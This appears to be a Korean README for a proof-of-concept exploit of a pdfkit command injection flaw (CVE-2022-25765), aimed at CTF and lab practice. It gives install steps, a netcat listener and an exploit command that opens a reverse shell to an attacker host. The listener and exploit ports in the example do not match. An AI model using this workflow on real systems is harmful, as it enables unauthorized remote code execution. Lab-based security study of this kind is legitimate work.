
Python용 CVE-2022-25765 개념 증명(PoC) — pdfkit의 명령 주입 취약점으로, 조작된 PDF 생성을 통해 원격 코드 실행을 가능하게 합니다.
CVE-2022-25765에 대한 PoC로, 취약한 버전의 pdfkit에 영향을 미칩니다.
pdfkit 0.8.6에서 테스트되었습니다.
requestscolorama의존성 설치:
pip3 install -r requirements.txt
또는 수동으로:
pip3 install requests colorama
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>
예시: 리스너 실행
nc -lvnp 4242
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444
저장소 클론:
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765
요구 사항 설치:
pip3 install -r requirements.txt
랩 환경의 대상에 대해 PoC를 실행하세요.
CVE-2022-25765는 취약한 버전의 pdfkit에서 발생하는 명령 주입 취약점입니다.
이 문제는 PDF 생성 프로세스에 전달되는 사용자 제어 입력의 불충분한 검증과 관련이 있습니다.
이 PoC는 주로 학습 및 CTF/랩 환경을 위해 제작되었습니다.
시도해 볼 곳을 찾고 있다면, Hack The Box : 머신: Precious.
소유한 시스템 또는 명시적 테스트 권한이 있는 시스템에만 사용하세요.
이 프로젝트로 인한 오용 또는 피해에 대해 책임을 지지 않습니다.
INNOCENTx0